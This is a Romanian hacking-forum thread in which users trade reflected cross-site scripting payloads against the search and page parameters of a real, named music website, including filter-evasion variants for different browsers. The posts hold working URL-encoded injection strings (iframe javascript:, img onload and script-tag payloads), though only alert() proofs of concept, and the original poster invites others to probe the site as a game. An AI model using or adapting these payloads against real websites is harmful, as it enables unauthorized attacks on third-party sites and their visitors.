Jump to content
shark0der

Dubste.net XSS

Recommended Posts

Posted

Cine are chef, asta e la ce am ajuns eu, mai lipseste un spatiu (cred) care nu ma lasa sa-l bag:

http://www.dubstep.net/?p=2'onclick='alert(1);'

Nu e vreun pe bani, nici premiu, nici vreun ajutor pentru mine, nici nimic altceva - doar daca are cineva chef distractii :)

Ar fi bine sa nu spargeti nimic ci doar sa gasiti si eventual sa raportati, ascult muzica de acolo in fiecare zi :D

PS: Nu uitati sa postati aici daca gasiti ceva :)

Posted

@shark0der:

1 Nu ai postat unde trebuie ... beleste ochii data viitoare !

2 O vulnerabilitate nu exista fara POC ... asta se face la Showoff ... iar tu nu ai gasit absolut nimic !!

3 Cu un XSS nu te distrezi ... vulnerabilitatile nu sunt de distractie !

4 Ar fi bine sa citesti regulile ca daca nu ... n-o sa ai viata lunga pe forum !

Posted
@shark0der:

1 Nu ai postat unde trebuie ... beleste ochii data viitoare !

2 O vulnerabilitate nu exista fara POC ... asta se face la Showoff ... iar tu nu ai gasit absolut nimic !!

3 Cu un XSS nu te distrezi ... vulnerabilitatile nu sunt de distractie !

4 Ar fi bine sa citesti regulile ca daca nu ... n-o sa ai viata lunga pe forum !

Nu am zis ca am gasit o vulnerabilitate - nu e showoff, mai mult de atat nici nu am folosit cuvantul "vulnerabilitate". Am gasit doar ca e vulnerabil, nu vulnerabilitatea in sine - din acest motiv am si postat la "Challenges", ca am belit ochii unde as putea posta asa ceva. Am mentionat clar ca nu se face pentru bani, si am spus clar ca ar fi bine sa nu se sparga nimic, adica intelege si unul cu 2 clase ca e in scop educational, ceea ce nu contravine nici uneia din regulile site-ului (chiar am recitit intreg regulamentul ca sa fiu sigur). Te invit sa ma contrazici daca nu am dreptate.

Posted
http://www.dubstep.net/search.php?q=%27%22%3E%3Ciframe+src%3D%22javascript%3Aalert%28%2Fxss%2F%29%3B%22%3E%3C%2Fiframe%3E%3C

Merge doar in FF. Ai idee cum am putea modifica sa mearga si in Chrome sau IE? Am deschis un thread asemanator, pentru exemple de xss in Chrome sau IE. Am gasit cateva siteuri vulnerabile la XSS dar merge numai in FF orice as incerca. Sunt sigur ca exista si pentru restul browserelor.

Multumesc oricui imi da un exemplu, link unde sa invat, ce as putea sa caut sa ma documentez.

Guest Nemessis
Posted

Daca reusesti sa faci un encoding care sa iti permita sa treci de filtre exista destule sanse. Doar ca nu e usor.

Posted

Imi cer scuze, pentru gafi.

IE.

http://www.dubstep.net/search.php?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Felectrohouse.ucoz.com%2F_ld%2F7%2F04134862.jpg%22+onload%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%2F%3E

Posted
Imi cer scuze, pentru gafi.

IE.

http://www.dubstep.net/search.php?q=%22%3E%3Cimg+src%3D%22http%3A%2F%2Felectrohouse.ucoz.com%2F_ld%2F7%2F04134862.jpg%22+onload%3D%22alert%28String.fromCharCode%2888%2C83%2C83%29%29%22%2F%3E

Multumesc pentru ajutor, in ultima ver de IE tot nu merge dar oricum multumesc. Mi-am facut o idee in mare despre ce este vorba, o sa trec la coding.

Posted
Daca reusesti sa faci un encoding care sa iti permita sa treci de filtre exista destule sanse. Doar ca nu e usor.


http://www.dubstep.net/search.php?q=%22%3E%3Cscript%3E/*///*/alert(/Helloworld/);/*xx*/%3C/script%3E

 "><script>/*///*/alert(/hello world/);/**/</script>

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...